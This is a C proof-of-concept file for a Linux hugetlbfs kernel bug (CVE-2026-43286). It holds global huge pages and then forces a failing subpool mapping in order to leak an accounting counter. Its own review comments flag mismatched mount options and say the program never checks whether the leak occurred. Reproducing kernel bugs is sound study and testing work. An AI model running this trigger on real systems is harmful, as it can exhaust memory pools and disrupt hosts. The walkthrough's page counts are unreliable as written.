/*
* PoC for CVE-2026-43286
* Conceptual reproduction to trigger subpool leak.
* Requires root privileges to mount hugetlbfs and allocate pages.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
/*
 * Size in bytes of one huge page, used as the unit for every mapping length
 * in this file.
 * NOTE(review): the anonymous MAP_HUGETLB mapping below does not select a
 * page size explicitly, so this presumably has to match the system default
 * huge page size (Hugepagesize in /proc/meminfo) - confirm on the test host.
 */
#define HUGETLB_SIZE (2 * 1024 * 1024) // 2MB huge page
/*
 * Create `count` anonymous huge-page mappings of HUGETLB_SIZE bytes each so
 * that they are taken out of the global huge page pool.
 *
 * The mappings are intentionally never unmapped and their addresses are not
 * kept; they stay in place for the rest of the process lifetime.
 * NOTE(review): the pages are mapped but never written to - presumably the
 * mapping alone is enough to hold the page; confirm.
 *
 * On the first mmap() failure the error is reported with perror() and the
 * function returns early. It returns void, so the caller cannot tell whether
 * all `count` mappings were created.
 */
void consume_global_pages(int count) {
    const int prot = PROT_READ | PROT_WRITE;
    const int flags = MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB;
    int mapped = 0;

    while (mapped < count) {
        void *region = mmap(NULL, HUGETLB_SIZE, prot, flags, -1, 0);

        if (region == MAP_FAILED) {
            perror("mmap global failed");
            return;
        }
        // The mapping is left in place on purpose so the page stays held.
        mapped++;
    }

    printf("Consumed %d global pages.\n", count);
}
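/*
 * Walks through the scenario described in the file header: hold part of the
 * global huge page pool, then request a shared mapping on a hugetlbfs mount
 * that has a subpool, and report whether that mapping succeeded.
 *
 * Returns 1 if the test file cannot be opened, 0 otherwise. The exit status
 * does not say whether the kernel is affected: this program never reads the
 * subpool counters, it only exercises the allocation path.
 */
int main(void) {
    // Step 1: Setup environment (conceptual, usually done via shell)
    // mount -t hugetlbfs none /mnt/huge -o min_size=2M,max_size=4M
    // NOTE(review): with 2 MB pages, 2M/4M corresponds to 1 and 2 pages, not
    // the min=2/max=4 pages assumed in the steps below, and the hugetlbfs
    // documentation names the upper-limit option `size=`. Reconcile the mount
    // line with the page counts before relying on this walkthrough.

    // Step 2: Consume global pages to create a scenario where global allocation fails
    // Assuming we have limited global pool, e.g., 4 pages total, subpool min=2, max=4
    // We consume 2 pages globally, leaving 2 for the system/subpool interactions.
    // consume_global_pages() returns void: if it fails it only prints an
    // error, and the steps below still run against an unprepared pool.
    consume_global_pages(2);

    // Step 3: Open a file on the hugetlbfs mount (subpool).
    // 0600 rather than 0755: this is a scratch data file created as root, so
    // it needs neither execute bits nor access for other users.
    int fd = open("/mnt/huge/test_file", O_CREAT | O_RDWR, 0600);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    // Step 4: Request 3 pages from the subpool.
    // Subpool min=2, max=4. Used=0.
    // Request asks for 3. Subpool provides 2, asks Global for 1.
    // If Global is exhausted (consumed in step 2), global allocation fails.
    // Reported defect: spool->used_hpages increases by 3, but only decreases
    // by 2 on failure, leaving 1 page leaked in the used_hpages counter.
    const size_t request_len = 3 * HUGETLB_SIZE;
    void *addr = mmap(NULL, request_len, PROT_READ | PROT_WRITE,
                      MAP_SHARED, fd, 0);

    if (addr == MAP_FAILED) {
        // Report the real errno: mmap() can fail for reasons unrelated to
        // pool exhaustion (wrong page size, subpool limit, missing mount).
        perror("mmap subpool");
        printf("Subpool mapping failed; this is the failure path the scenario targets.\n");
        // A failed mapping alone proves nothing about the counter: a kernel
        // without the defect is expected to fail here as well.
        // NOTE(review): statfs(2)/df on the mount presumably reflects the
        // subpool usage and is the place to compare before/after - confirm.
        printf("This program does not read used_hpages; confirm the counter state separately.\n");
    } else {
        printf("Allocation succeeded, vulnerability might not be triggered or pool is larger.\n");
        munmap(addr, request_len);
    }

    close(fd);
    return 0;
}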